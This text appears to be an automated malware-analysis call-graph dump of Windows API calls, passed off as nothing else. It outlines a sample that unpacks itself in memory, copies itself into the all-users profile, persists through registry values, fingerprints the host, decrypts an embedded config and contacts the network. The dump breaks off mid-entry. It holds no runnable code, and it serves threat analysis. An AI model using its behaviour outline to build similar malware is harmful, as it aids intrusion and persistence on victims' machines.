56e324 13566->13567 13568 56e339 13566->13568 13569 5662bc _free 20 API calls 13567->13569 13580 56e38c 13568->13580 13571 56e329 13569->13571 13574 5662a9 __dosmaperr 20 API calls 13571->13574 13572->13534 13573 56e334 13627 56e363 13573->13627 13574->13573 13577 566a68 _free 20 API calls 13576->13577 13578 5662ae 13577->13578 13578->13561 13579->13566 13581 56e3ba 13580->13581 13594 56e3b3 _abort 13580->13594 13582 56e3be 13581->13582 13583 56e3dd 13581->13583 13585 5662a9 __dosmaperr 20 API calls 13582->13585 13586 56e42e 13583->13586 13587 56e411 13583->13587 13584 56a183 _ValidateLocalCookies 5 API calls 13588 56e594 13584->13588 13589 56e3c3 13585->13589 13591 56e444 13586->13591 13630 56e88b 13586->13630 13590 5662a9 __dosmaperr 20 API calls 13587->13590 13588->13573 13592 5662bc _free 20 API calls 13589->13592 13596 56e416 13590->13596 13633 56df31 13591->13633 13592->13594 13594->13584 13598 5662bc _free 20 API calls 13596->13598 13598->13594 13599 56e452 13601 56e478 13599->13601 13606 56e456 13599->13606 13600 56e48b 13602 56e4e5 WriteFile 13600->13602 13603 56e49f 13600->13603 13645 56dd11 GetConsoleCP 13601->13645 13609 56e508 GetLastError 13602->13609 13614 56e46e 13602->13614 13604 56e4a7 13603->13604 13605 56e4d5 13603->13605 13610 56e4c5 13604->13610 13611 56e4ac 13604->13611 13671 56dfa7 13605->13671 13607 56e54c 13606->13607 13640 56dec4 13606->13640 13607->13594 13616 5662bc _free 20 API calls 13607->13616 13609->13614 13663 56e174 13610->13663 13611->13607 13656 56e086 13611->13656 13614->13594 13614->13607 13617 56e528 13614->13617 13619 56e571 13616->13619 13621 56e543 13617->13621 13622 56e52f 13617->13622 13620 5662a9 __dosmaperr 20 API calls 13619->13620 13620->13594 13678 566286 13621->13678 13623 5662bc _free 20 API calls 13622->13623 13625 56e534 13623->13625 13626 5662a9 __dosmaperr 20 API calls 13625->13626 13626->13594 13715 56c9bd LeaveCriticalSection 13627->13715 13629 56e369 13629->13572 13683 56e80d 13630->13683 13703 56d920 13633->13703 13635 56df41 13636 56df46 13635->13636 13637 5669e4 _abort 35 API calls 13635->13637 13636->13599 13636->13600 13638 56df69 13637->13638 13638->13636 13639 56df87 GetConsoleMode 13638->13639 13639->13636 13643 56dee9 13640->13643 13644 56df1e 13640->13644 13641 56ea01 WriteConsoleW CreateFileW 13641->13643 13642 56df20 GetLastError 13642->13644 13643->13641 13643->13642 13643->13644 13644->13614 13649 56dd74 13645->13649 13655 56de86 13645->13655 13646 56a183 _ValidateLocalCookies 5 API calls 13648 56dec0 13646->13648 13648->13614 13650 56d2d9 37 API calls __fassign 13649->13650 13651 56ddfa WideCharToMultiByte 13649->13651 13654 56de51 WriteFile 13649->13654 13649->13655 13710 56977f 13649->13710 13650->13649 13652 56de20 WriteFile 13651->13652 13651->13655 13652->13649 13653 56dea9 GetLastError 13652->13653 13653->13655 13654->13649 13654->13653 13655->13646 13657 56e095 13656->13657 13658 56e157 13657->13658 13660 56e113 WriteFile 13657->13660 13659 56a183 _ValidateLocalCookies 5 API calls 13658->13659 13662 56e170 13659->13662 13660->13657 13661 56e159 GetLastError 13660->13661 13661->13658 13662->13614 13668 56e183 13663->13668 13664 56e28e 13665 56a183 _ValidateLocalCookies 5 API calls 13664->13665 13666 56e29d 13665->13666 13666->13614 13667 56e205 WideCharToMultiByte 13669 56e286 GetLastError 13667->13669 13670 56e23a WriteFile 13667->13670 13668->13664 13668->13667 13668->13670 13669->13664 13670->13668 13670->13669 13675 56dfb6 13671->13675 13672 56e069 13673 56a183 _ValidateLocalCookies 5 API calls 13672->13673 13677 56e082 13673->13677 13674 56e028 WriteFile 13674->13675 13676 56e06b GetLastError 13674->13676 13675->13672 13675->13674 13676->13672 13677->13614 13679 5662a9 __dosmaperr 20 API calls 13678->13679 13680 566291 _free 13679->13680 13681 5662bc _free 20 API calls 13680->13681 13682 5662a4 13681->13682 13682->13594 13692 56ca71 13683->13692 13685 56e81f 13686 56e827 13685->13686 13687 56e838 SetFilePointerEx 13685->13687 13688 5662bc _free 20 API calls 13686->13688 13689 56e850 GetLastError 13687->13689 13690 56e82c 13687->13690 13688->13690 13691 566286 __dosmaperr 20 API calls 13689->13691 13690->13591 13691->13690 13693 56ca93 13692->13693 13694 56ca7e 13692->13694 13696 5662a9 __dosmaperr 20 API calls 13693->13696 13700 56cab8 13693->13700 13695 5662a9 __dosmaperr 20 API calls 13694->13695 13697 56ca83 13695->13697 13698 56cac3 13696->13698 13699 5662bc _free 20 API calls 13697->13699 13701 5662bc _free 20 API calls 13698->13701 13702 56ca8b _abort 13699->13702 13700->13685 13701->13702 13702->13685 13704 56d92d 13703->13704 13706 56d93a 13703->13706 13705 5662bc _free 20 API calls 13704->13705 13709 56d932 _abort 13705->13709 13707 5662bc _free 20 API calls 13706->13707 13708 56d946 13706->13708 13707->13709 13708->13635 13709->13635 13711 5669e4 _abort 35 API calls 13710->13711 13712 56978a 13711->13712 13713 569725 __fassign 35 API calls 13712->13713 13714 56979a 13713->13714 13714->13649 13715->13629 13719 56ed00 13716->13719 13718 56eda6 13718->13552 13720 56ed0c ___scrt_is_nonwritable_in_current_image 13719->13720 13730 56c99a EnterCriticalSection 13720->13730 13722 56ed1a 13723 56ed41 13722->13723 13724 56ed4c 13722->13724 13731 56ee29 13723->13731 13726 5662bc _free 20 API calls 13724->13726 13727 56ed47 13726->13727 13746 56ed76 13727->13746 13729 56ed69 ___scrt_is_nonwritable_in_current_image 13729->13718 13730->13722 13732 56ca71 20 API calls 13731->13732 13735 56ee39 13732->13735 13733 56ee3f 13749 56c9e0 13733->13749 13735->13733 13736 56ca71 20 API calls 13735->13736 13744 56ee71 13735->13744 13739 56ee68 13736->13739 13737 56ca71 20 API calls 13740 56ee7d CloseHandle 13737->13740 13741 56ca71 20 API calls 13739->13741 13740->13733 13742 56ee89 GetLastError 13740->13742 13741->13744 13742->13733 13743 566286 __dosmaperr 20 API calls 13745 56eeb9 13743->13745 13744->13733 13744->13737 13745->13727 13758 56c9bd LeaveCriticalSection 13746->13758 13748 56ed80 13748->13729 13750 56ca56 13749->13750 13753 56c9ef 13749->13753 13751 5662bc _free 20 API calls 13750->13751 13752 56ca5b 13751->13752 13754 5662a9 __dosmaperr 20 API calls 13752->13754 13753->13750 13757 56ca19 13753->13757 13755 56ca46 13754->13755 13755->13743 13755->13745 13756 56ca40 SetStdHandle 13756->13755 13757->13755 13757->13756 13758->13748 13759->13528 13760->13510 13773 a12f60 13776 a13090 GetPEB 13773->13776 13775 a12f72 13776->13775 11103 56a011 11104 56a01d ___scrt_is_nonwritable_in_current_image 11103->11104 11128 56a87d 11104->11128 11106 56a024 11108 56a04d 11106->11108 11167 56a338 IsProcessorFeaturePresent 11106->11167 11113 56a08c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11108->11113 11139 569801 11108->11139 11111 5697a5 _abort 5 API calls 11111->11113 11112 56a06c ___scrt_is_nonwritable_in_current_image 11117 56a0ec 11113->11117 11171 568a5e 11113->11171 11115 56a0f2 11147 564025 11115->11147 11143 56a453 11117->11143 11129 56a886 11128->11129 11178 56a194 IsProcessorFeaturePresent 11129->11178 11133 56a897 11134 56a89b 11133->11134 11189 56c20b 11133->11189 11134->11106 11137 56a8b2 11137->11106 11142 569818 11139->11142 11140 56a183 _ValidateLocalCookies 5 API calls 11141 569842 11140->11141 11141->11111 11141->11112 11142->11140 11323 56ac20 11143->11323 11146 56a479 11146->11115 11350 564490 11147->11350 11149 5641ac 11325 571a93 11149->11325 11153 56424c 11154 564480 ExitProcess 11153->11154 11155 564346 11153->11155 11156 56427c 11153->11156 11155->11154 11158 56435c CreateFileA 11155->11158 11336 564d82 11156->11336 11364 563c6d 11158->11364 11159 5642a7 11340 570d94 11159->11340 11163 5642f5 11344 56ff0d 11163->11344 11164 563c6d CreateNamedPipeA 11166 56433a 11164->11166 11166->11154 11168 56a34e ___scrt_fastfail 11167->11168 11169 56a3f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11168->11169 11170 56a440 11169->11170 11170->11106 11172 568a86 try_get_function 11171->11172 11173 569c2d _abort 11171->11173 11172->11117 11174 5669e4 _abort 35 API calls 11173->11174 11176 569c3e 11174->11176 11175 56731c _abort 35 API calls 11177 569c68 11175->11177 11176->11175 11179 56a1ba 11178->11179 11180 56b4a4 11179->11180 11181 56b4a9 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 11180->11181 11200 56b6b8 11181->11200 11184 56b4b7 11184->11133 11186 56b4bf 11187 56b4ca 11186->11187 11214 56b6f4 11186->11214 11187->11133 11255 56ccc9 11189->11255 11192 56b4cd 11193 56b4d6 11192->11193 11199 56b4e7 11192->11199 11194 56b69d ___vcrt_uninitialize_ptd 6 API calls 11193->11194 11195 56b4db 11194->11195 11196 56b6f4 ___vcrt_uninitialize_locks DeleteCriticalSection 11195->11196 11197 56b4e0 11196->11197 11319 56b975 11197->11319 11199->11134 11201 56b6c1 11200->11201 11203 56b6ea 11201->11203 11204 56b4b3 11201->11204 11218 56b8f5 11201->11218 11205 56b6f4 ___vcrt_uninitialize_locks DeleteCriticalSection 11203->11205 11204->11184 11206 56b66a 11204->11206 11205->11204 11236 56b844 11206->11236 11208 56b674 11209 56b67f 11208->11209 11241 56b8b8 11208->11241 11209->11186 11211 56b68d 11212 56b69a 11211->11212 11246 56b69d 11211->11246 11212->11186 11215 56b6ff 11214->11215 11217 56b71e 11214->11217 11216 56b709 DeleteCriticalSection 11215->11216 11216->11216 11216->11217 11217->11184 11223 56b723 11218->11223 11220 56b90f 11221 56b92c InitializeCriticalSectionAndSpinCount 11220->11221 11222 56b918 11220->11222 11221->11222 11222->11201 11226 56b753 11223->11226 11228 56b757 try_get_function 11223->11228 11224 56b777 11227 56b783 GetProcAddress 11224->11227 11224->11228 11226->11224 11226->11228 11229 56b7c3 11226->11229 11227->11228 11228->11220 11230 56b7eb LoadLibraryExW 11229->11230 11231 56b7e0 11229->11231 11232 56b807 GetLastError 11230->11232 11233 56b81f 11230->11233 11231->11226 11232->11233 11234 56b812 LoadLibraryExW 11232->11234 11233->11231 11235 56b836 FreeLibrary 11233->11235 11234->11233 11235->11231 11237 56b723 try_get_function 5 API calls 11236->11237 11238 56b85e 11237->11238 11239 56b876 TlsAlloc 11238->11239 11240 56b867 11238->11240 11240->11208 11242 56b723 try_get_function 5 API calls 11241->11242 11243 56b8d2 11242->11243 11244 56b8ec TlsSetValue 11243->11244 11245 56b8e1 11243->11245 11244->11245 11245->11211 11247 56b6a7 11246->11247 11248 56b6ad 11246->11248 11250 56b87e 11247->11250 11248->11209 11251 56b723 try_get_function 5 API calls 11250->11251 11252 56b898 11251->11252 11253 56b8af TlsFree 11252->11253 11254 56b8a4 11252->11254 11253->11254 11254->11248 11256 56cce6 11255->11256 11259 56cce2 11255->11259 11256->11259 11261 56cc47 11256->11261 11257 56a183 _ValidateLocalCookies 5 API calls 11258 56a8a4 11257->11258 11258->11137 11258->11192 11259->11257 11262 56cc53 ___scrt_is_nonwritable_in_current_image 11261->11262 11273 567c63 EnterCriticalSection 11262->11273 11264 56cc5a 11274 56c902 11264->11274 11266 56cc69 11267 56cc78 11266->11267 11285 56cadb GetStartupInfoW 11266->11285 11296 56cc94 11267->11296 11270 56cc89 ___scrt_is_nonwritable_in_current_image 11270->11256 11273->11264 11275 56c90e ___scrt_is_nonwritable_in_current_image 11274->11275 11276 56c932 11275->11276 11277 56c91b 11275->11277 11299 567c63 EnterCriticalSection 11276->11299 11278 5662bc _free 20 API calls 11277->11278 11283 56c920 ___scrt_is_nonwritable_in_current_image _abort 11278->11283 11280 56c96a 11307 56c991 11280->11307 11281 56c93e 11281->11280 11300 56c853 11281->11300 11283->11266 11286 56cb8a 11285->11286 11287 56caf8 11285->11287 11291 56cb91 11286->11291 11287->11286 11288 56c902 21 API calls 11287->11288 11289 56cb21 11288->11289 11289->11286 11290 56cb4f GetFileType 11289->11290 11290->11289 11292 56cb98 11291->11292 11293 56cbdb GetStdHandle 11292->11293 11294 56cc43 11292->11294 11295 56cbee GetFileType 11292->11295 11293->11292 11294->11267 11295->11292 11318 567cab LeaveCriticalSection 11296->11318 11298 56cc9b 11298->11270 11299->11281 11301 56735f _free 20 API calls 11300->11301 11302 56c865 11301->11302 11306 56c872 11302->11306 11310 567668 11302->11310 11303 5673bc _free 20 API calls 11304 56c8c4 11303->11304 11304->11281 11306->11303 11317 567cab LeaveCriticalSection 11307->11317 11309 56c998 11309->11283 11311 5673f6 _free 5 API calls 11310->11311 11312 56768f 11311->11312 11313 5676ad InitializeCriticalSectionAndSpinCount 11312->11313 11314 567698 11312->11314 11313->11314 11315 56a183 _ValidateLocalCookies 5 API calls 11314->11315 11316 5676c4 11315->11316 11316->11302 11317->11309 11318->11298 11320 56b9a4 11319->11320 11321 56b97e 11319->11321 11320->11199 11321->11320 11322 56b98e FreeLibrary 11321->11322 11322->11321 11324 56a466 GetStartupInfoW 11323->11324 11324->11146 11326 571ada 11325->11326 11329 571cbc 11325->11329 11367 563260 11326->11367 11327 5641fc 11357 570042 11327->11357 11329->11327 11331 571cd2 GetCurrentActCtx 11329->11331 11331->11329 11335 571b65 11335->11327 11335->11335 11337 564e38 11336->11337 11338 564dbe 11336->11338 11337->11159 11338->11337 11400 5703bb 11338->11400 11341 570dda 11340->11341 11343 570de9 11340->11343 11342 570f73 GetNamedPipeHandleStateA 11341->11342 11341->11343 11342->11343 11343->11163 11345 57001b 11344->11345 11346 56ff4d 11344->11346 11347 570013 11345->11347 11348 57002d ExitThread 11345->11348 11404 9d6000 GetPEB 11346->11404 11347->11166 11351 5644f3 11350->11351 11356 5646de 11350->11356 11352 5646ec GetNamedPipeHandleStateA 11351->11352 11354 564502 11351->11354 11353 5647ca ExitThread 11352->11353 11352->11356 11354->11356 12264 563718 11354->12264 11356->11149 11358 570082 11357->11358 11359 5700ba 11357->11359 11360 570091 11358->11360 11361 57020d 11358->11361 11359->11153 12289 563d97 11360->12289 11363 570254 CloseHandle 11361->11363 11363->11359 11365 563d29 CreateNamedPipeA 11364->11365 11366 563cb4 11364->11366 11365->11366 11366->11164 11368 5632b7 11367->11368 11371 563370 11367->11371 11369 563c6d CreateNamedPipeA 11368->11369 11368->11371 11370 563310 11369->11370 11392 570c83 11370->11392 11373 561204 11371->11373 11374 56135f 11373->11374 11375 56125a 11373->11375 11376 561376 11374->11376 11384 56130e 11374->11384 11377 561316 11375->11377 11378 56126c VirtualAlloc 11375->11378 11379 564490 10 API calls 11376->11379 11381 561343 GetLastError 11377->11381 11377->11384 11383 5612be 11378->11383 11382 5613c4 11379->11382 11381->11377 11385 570042 2 API calls 11382->11385 11396 570288 11383->11396 11388 57049e 11384->11388 11387 56141c 11385->11387 11387->11384 11389 5704ef 11388->11389 11390 5704db 11388->11390 11389->11335 11390->11389 11391 570626 CreateThread 11390->11391 11391->11389 11393 570cd6 11392->11393 11394 570cbe 11392->11394 11393->11371 11394->11393 11395 570d17 CreateFileA 11394->11395 11395->11393 11397 5702ee 11396->11397 11398 5702ca 11396->11398 11397->11384 11398->11397 11399 563260 2 API calls 11398->11399 11399->11398 11401 5703f3 11400->11401 11402 5703fd 11400->11402 11401->11402 11403 570476 GetProcessHeap HeapWalk 11401->11403 11402->11337 11403->11402 11403->11403 11406 9d6059 11404->11406 11405 9d60e0 11405->11347 11406->11405 11407 9d61fd VirtualAlloc 11406->11407 11414 9d6ae1 11407->11414 11409 9d6257 VirtualAlloc 11412 9d6297 11409->11412 11410 9d634d LoadLibraryA 11410->11412 11411 9d63be 11418 a13b00 11411->11418 11412->11410 11412->11411 11415 9d6b0f 11414->11415 11417 9d6b0a 11414->11417 11461 9d6644 11415->11461 11417->11409 11419 a13b0d 11418->11419 11472 a12ed0 11419->11472 11421 a13b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 11475 a14510 11421->11475 11423 a1400a ExitProcess 11424 a13b54 11424->11423 11493 a15700 11424->11493 11428 a13b9f 11527 a19400 11428->11527 11434 a13be1 11544 a15e00 CreateMutexA GetLastError 11434->11544 11436 a13beb StrStrIA 11545 a11120 11436->11545 11447 a13c92 11593 a15b50 11447->11593 11451 a13df8 11456 a13e30 11451->11456 11633 a178d0 11451->11633 11454 a14020 278 API calls 11454->11456 11455 a13fed Sleep 11455->11423 11455->11456 11456->11454 11456->11455 11457 a13f09 11456->11457 11620 a17970 11456->11620 11457->11456 11460 a13f62 VirtualFree 11457->11460 11637 a142e0 11457->11637 11642 a14020 11457->11642 11460->11457 11462 9d6658 11461->11462 11463 9d6670 11462->11463 11465 9d6c01 11462->11465 11463->11417 11467 9d6c28 11465->11467 11466 9d6c42 11466->11463 11467->11466 11469 9d6b8a 11467->11469 11470 9d6b95 RtlAllocateHeap 11469->11470 11471 9d6bad 11470->11471 11471->11466 11665 a13090 GetPEB 11472->11665 11474 a12edf 11474->11421 11476 a147e6 11475->11476 11477 a14528 11475->11477 11476->11424 11477->11476 11478 a1455b GetModuleFileNameA CreateFileA 11477->11478 11478->11476 11479 a145a4 GetFileSize 11478->11479 11480 a147d0 11479->11480 11481 a145c6 VirtualAlloc 11479->11481 11480->11476 11483 a147d9 CloseHandle 11480->11483 11481->11480 11482 a145ef ReadFile 11481->11482 11484 a14625 11482->11484 11485 a1466f 11482->11485 11483->11476 11484->11485 11486 a14637 FindCloseChangeNotification 11484->11486 11485->11480 11487 a147b2 VirtualFree 11485->11487 11666 a147f0 11486->11666 11487->11480 11490 a14681 VirtualFree 11492 a1469f 11490->11492 11491 a147f0 15 API calls 11491->11492 11492->11485 11492->11491 11494 a15717 11493->11494 11495 a13b84 11493->11495 11686 a18f80 11494->11686 11514 a15a00 11495->11514 11501 a15773 11755 a15cd0 11501->11755 11504 a157d1 11505 a157e6 GetAllUsersProfileDirectoryA 11504->11505 11506 a157f9 GetEnvironmentVariableA 11504->11506 11507 a15810 wnsprintfA CreateFileA 11505->11507 11506->11507 11507->11495 11508 a15867 GetFileSize 11507->11508 11509 a15886 VirtualAlloc 11508->11509 11510 a15918 FindCloseChangeNotification 11508->11510 11509->11510 11511 a158ab ReadFile 11509->11511 11510->11495 11512 a15904 VirtualFree 11511->11512 11513 a158e4 11511->11513 11512->11510 11513->11510 11515 a15b44 11514->11515 11516 a15a18 11514->11516 11515->11428 11516->11515 11517 a15a3a lstrcpyA 11516->11517 11780 a15930 11517->11780 11519 a15a62 11520 a15a74 lstrlenA 11519->11520 11520->11515 11521 a15a8c lstrcpyA lstrlenA lstrlenA 11520->11521 11521->11515 11522 a15abf lstrcatA RegCreateKeyExA 11521->11522 11523 a15b16 11522->11523 11524 a15b0a RegCloseKey 11522->11524 11526 a15b25 lstrcpyA 11523->11526 11525 a15b37 lstrlenA 11524->11525 11525->11515 11526->11525 11528 a13bcf 11527->11528 11531 a1941a 11527->11531 11533 a199f0 GetCurrentProcess OpenProcessToken 11528->11533 11531->11528 11532 a19502 lstrcpyA CharUpperA 11531->11532 11784 a18bb0 11531->11784 11800 a19650 11531->11800 11532->11531 11534 a19a1f GetTokenInformation 11533->11534 11539 a13bd7 11533->11539 11535 a19a50 GetTokenInformation 11534->11535 11536 a19b76 CloseHandle 11534->11536 11535->11536 11537 a19a85 CreateWellKnownSid EqualSid 11535->11537 11536->11539 11538 a19ad4 CreateWellKnownSid EqualSid 11537->11538 11537->11539 11538->11539 11540 a19b0a CreateWellKnownSid EqualSid 11538->11540 11542 a16060 GetModuleFileNameA 11539->11542 11540->11539 11541 a19b40 CreateWellKnownSid EqualSid 11540->11541 11541->11536 11541->11539 11543 a16091 11542->11543 11543->11434 11544->11436 11546 a1113a 11545->11546 11560 a11289 11545->11560 11547 a11144 lstrlenA 11546->11547 11546->11560 11548 a11156 lstrlenA 11547->11548 11547->11560 11549 a11168 11548->11549 11548->11560 11550 a11177 GetAllUsersProfileDirectoryA 11549->11550 11551 a1118a GetEnvironmentVariableA 11549->11551 11552 a111a1 wnsprintfA lstrcmpiA 11550->11552 11551->11552 11553 a11216 11552->11553 11554 a111db 11552->11554 11809 a197a0 GetProcessHeap RtlAllocateHeap 11553->11809 11554->11553 11555 a111e3 CopyFileA SetFileAttributesA lstrcpyA 11554->11555 11555->11553 11557 a11220 lstrcpyA lstrcpyA CreateThread 11558 a112a3 11557->11558 11557->11560 11810 a112d0 11557->11810 11559 a197c0 2 API calls 11558->11559 11559->11560 11561 a15e30 11560->11561 11562 a15e64 RegOpenKeyExA 11561->11562 11563 a15e5d 11561->11563 11564 a15e8c RegQueryValueExA 11562->11564 11565 a13c39 11562->11565 11563->11562 11566 a15edc 11564->11566 11567 a15ebc 11564->11567 11572 a16cf0 11565->11572 11568 a15f15 RegCloseKey 11566->11568 11816 a19bd0 11566->11816 11567->11566 11569 a15ece RegDeleteValueA 11567->11569 11568->11565 11569->11566 11573 a16d13 RegOpenKeyExA 11572->11573 11574 a16d0c 11572->11574 11575 a16d3a RegQueryValueExA 11573->11575 11576 a13c4d 11573->11576 11574->11573 11577 a16d70 RegDeleteValueA 11575->11577 11578 a16d84 RegCloseKey 11575->11578 11579 a15f30 11576->11579 11577->11578 11578->11576 11820 a17d20 11579->11820 11582 a15f92 11583 a15f99 RegOpenKeyExA 11582->11583 11584 a15fc1 RegQueryValueExA 11583->11584 11585 a13c58 11583->11585 11586 a15ffc 11584->11586 11590 a19b90 11585->11590 11587 a16041 RegCloseKey 11586->11587 11588 a19bd0 QueryPerformanceCounter 11586->11588 11587->11585 11589 a16020 RegSetValueExA 11588->11589 11589->11587 11591 a19ba0 QueryPerformanceCounter 11590->11591 11592 a13c71 WSAStartup 11590->11592 11591->11592 11592->11423 11592->11447 11594 a15b67 11593->11594 11595 a13dac 11593->11595 11594->11595 11596 a15b7b lstrlenA lstrlenA 11594->11596 11607 a18a70 11595->11607 11601 a15ba3 11596->11601 11597 a15be0 VirtualAlloc 11597->11595 11600 a15c09 11597->11600 11598 a15bab StrStrIA 11599 a15bdc 11598->11599 11598->11601 11599->11597 11602 a15c7f 11600->11602 11603 a15c1f StrStrIA 11600->11603 11601->11597 11601->11598 11602->11595 11605 a15c91 VirtualAlloc 11602->11605 11603->11602 11604 a15c39 lstrcpynA 11603->11604 11604->11600 11605->11595 11606 a15cad 11605->11606 11606->11595 11608 a18ba3 11607->11608 11609 a18a87 11607->11609 11608->11451 11609->11608 11610 a18ab9 CryptAcquireContextA 11609->11610 11611 a18b12 11610->11611 11612 a18add GetLastError 11610->11612 11611->11608 11615 a18b1c CryptImportKey 11611->11615 11613 a18af8 CryptAcquireContextA 11612->11613 11614 a18aef 11612->11614 11613->11611 11614->11611 11614->11613 11616 a18b41 CryptImportKey 11615->11616 11617 a18b97 CryptReleaseContext 11615->11617 11618 a18b68 CryptDecrypt CryptDestroyKey 11616->11618 11619 a18b8d CryptDestroyKey 11616->11619 11617->11608 11618->11619 11619->11617 11621 a17987 VirtualAlloc 11620->11621 11622 a17ae9 11620->11622 11621->11622 11623 a179b6 11621->11623 11622->11456 11822 a1a400 11623->11822 11626 a17ad8 VirtualFree 11626->11622 11627 a18a70 9 API calls 11628 a17a15 11627->11628 11628->11626 11629 a17a20 VirtualAlloc 11628->11629 11629->11626 11631 a17a5a 11629->11631 11630 a17ad0 11630->11626 11631->11630 11632 a17a89 inet_ntoa wnsprintfA 11631->11632 11632->11631 11634 a17965 11633->11634 11635 a178e4 11633->11635 11634->11456 11635->11634 11636 a17927 inet_ntoa wnsprintfA 11635->11636 11636->11635 11638 a142fa VirtualAlloc 11637->11638 11639 a144fd 11637->11639 11638->11639 11641 a144a3 11638->11641 11639->11457 11641->11639 11829 a192e0 11641->11829 11643 a142d7 11642->11643 11644 a14034 11642->11644 11643->11457 11644->11643 11645 a1405f InitializeCriticalSection CreateEventA 11644->11645 11646 a1409f 11645->11646 11647 a140ab EnterCriticalSection 11646->11647 11648 a142cd DeleteCriticalSection 11646->11648 11649 a140bb VirtualFree 11647->11649 11650 a140da 11647->11650 11648->11643 11649->11650 11651 a140e0 TerminateThread 11650->11651 11652 a140f3 ResetEvent LeaveCriticalSection CreateThread 11650->11652 11651->11652 11837 a197a0 GetProcessHeap RtlAllocateHeap 11652->11837 11838 a14ac0 11652->11838 11654 a1413a 11655 a14221 WaitForMultipleObjects WaitForSingleObject 11654->11655 11662 a141d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 11654->11662 11656 a1424b 11655->11656 11657 a1424f WaitForSingleObject 11655->11657 11656->11657 11658 a14273 EnterCriticalSection 11657->11658 11659 a14267 TerminateThread 11657->11659 11660 a14283 VirtualFree 11658->11660 11661 a142a2 LeaveCriticalSection 11658->11661 11659->11658 11660->11661 11663 a197c0 2 API calls 11661->11663 11662->11654 11851 a14ba0 CoInitialize 11662->11851 11664 a142bb 11663->11664 11664->11648 11665->11474 11667 a14807 11666->11667 11668 a14665 11666->11668 11667->11668 11669 a14814 CryptAcquireContextA 11667->11669 11668->11485 11668->11490 11668->11492 11670 a14834 GetLastError 11669->11670 11671 a14856 11669->11671 11670->11671 11672 a14841 CryptAcquireContextA 11670->11672 11671->11668 11673 a14a9f CryptReleaseContext 11671->11673 11674 a148be CryptCreateHash 11671->11674 11672->11671 11673->11668 11675 a14a90 11674->11675 11676 a148f9 CryptHashData 11674->11676 11675->11673 11677 a14a83 CryptDestroyHash 11676->11677 11678 a14919 CryptDeriveKey 11676->11678 11677->11675 11678->11677 11679 a1494a CryptDecrypt CryptDestroyKey 11678->11679 11679->11677 11680 a14995 CryptCreateHash 11679->11680 11680->11677 11681 a149b7 CryptHashData 11680->11681 11682 a14a76 CryptDestroyHash 11681->11682 11683 a149da CryptGetHashParam 11681->11683 11682->11677 11683->11682 11684 a14a11 CryptGetHashParam 11683->11684 11684->11682 11685 a14a3e 11684->11685 11685->11682 11687 a1572e GetModuleFileNameA 11686->11687 11688 a18f9a 11686->11688 11726 a11ca0 CreateToolhelp32Snapshot 11687->11726 11688->11687 11689 a18fed GetVersionExA 11688->11689 11690 a19005 GetSystemInfo 11689->11690 11691 a19266 11689->11691 11692 a19115 11690->11692 11693 a1901c 11690->11693 11691->11687 11694 a1926c lstrcatA 11691->11694 11695 a19110 11692->11695 11698 a19174 11692->11698 11699 a1912b 11692->11699 11696 a19042 11693->11696 11697 a19025 lstrcatA 11693->11697 11694->11687 11765 a19290 GetModuleHandleA GetProcAddress 11695->11765 11701 a19068 11696->11701 11702 a1904b lstrcatA 11696->11702 11697->11695 11706 a191c3 11698->11706 11707 a1917d 11698->11707 11703 a19134 lstrcatA 11699->11703 11704 a1914e 11699->11704 11701->11695 11711 a190a1 GetSystemMetrics 11701->11711 11719 a19087 lstrcatA 11701->11719 11702->11695 11703->11695 11704->11695 11708 a19157 lstrcatA 11704->11708 11706->11695 11715 a191d5 lstrcatA 11706->11715 11716 a191ef 11706->11716 11712 a191a0 11707->11712 11713 a19186 lstrcatA 11707->11713 11708->11695 11709 a19219 lstrcatA 11710 a19228 lstrlenA 11709->11710 11717 a19259 lstrlenA 11710->11717 11718 a19239 lstrcatA lstrcatA 11710->11718 11720 a190c7 GetSystemMetrics 11711->11720 11721 a190ad lstrcatA 11711->11721 11712->11695 11714 a191a9 lstrcatA 11712->11714 11713->11695 11714->11695 11715->11695 11716->11695 11724 a191f8 lstrcatA 11716->11724 11717->11691 11718->11717 11719->11695 11722 a190d3 lstrcatA 11720->11722 11723 a190ed 11720->11723 11721->11695 11722->11695 11723->11695 11725 a190f8 lstrcatA 11723->11725 11724->11695 11725->11695 11727 a11e51 11726->11727 11728 a11cc9 Process32First 11726->11728 11744 a19d20 11727->11744 11729 a11e44 CloseHandle 11728->11729 11730 a11cee GetCurrentProcessId 11728->11730 11729->11727 11731 a11d04 11730->11731 11732 a11d20 Process32Next 11731->11732 11733 a11d12 11731->11733 11732->11731 11732->11733 11733->11729 11734 a11d44 Process32First 11733->11734 11734->11729 11735 a11d5f 11734->11735 11736 a11d71 lstrlenA 11735->11736 11737 a11e29 Process32Next 11735->11737 11738 a11e27 11736->11738 11739 a11d87 lstrcpyA OpenProcess 11736->11739 11737->11729 11737->11735 11738->11729 11739->11738 11740 a11dbb EnumProcessModules 11739->11740 11741 a11e02 GetProcessImageFileNameA 11740->11741 11742 a11de5 GetModuleFileNameExA 11740->11742 11743 a11e16 FindCloseChangeNotification 11741->11743 11742->11743 11743->11738 11745 a19f5d 11744->11745 11746 a19d37 11744->11746 11745->11501 11746->11745 11747 a19d4b GetSystemDirectoryA 11746->11747 11747->11745 11748 a19da8 GetVolumeInformationA 11747->11748 11748->11745 11749 a19deb 11748->11749 11768 a19f70 11749->11768 11753 a19f50 CoTaskMemFree 11753->11745 11754 a19f0c WideCharToMultiByte lstrcpynA 11754->11753 11756 a15ce7 lstrlenA 11755->11756 11757 a1579d lstrcpyA 11755->11757 11756->11757 11758 a15cfa CreateFileA 11756->11758 11757->11504 11758->11757 11759 a15d23 GetFileSize 11758->11759 11760 a15d38 VirtualAlloc 11759->11760 11761 a15d9f FindCloseChangeNotification 11759->11761 11760->11761 11762 a15d54 ReadFile 11760->11762 11761->11757 11763 a15d7b 11762->11763 11764 a15d8e VirtualFree 11762->11764 11763->11764 11764->11761 11766 a19215 11765->11766 11767 a192bd GetCurrentProcess 11765->11767 11766->11709 11766->11710 11767->11766 11769 a19f87 11768->11769 11770 a19e2d StringFromCLSID 11768->11770 11769->11770 11776 a197a0 GetProcessHeap RtlAllocateHeap 11769->11776 11770->11753 11770->11754 11772 a19fb2 11772->11770 11773 a19fc8 GetAdaptersInfo 11772->11773 11775 a19ff4 11773->11775 11777 a197c0 11775->11777 11776->11772 11778 a197c9 GetProcessHeap RtlFreeHeap 11777->11778 11779 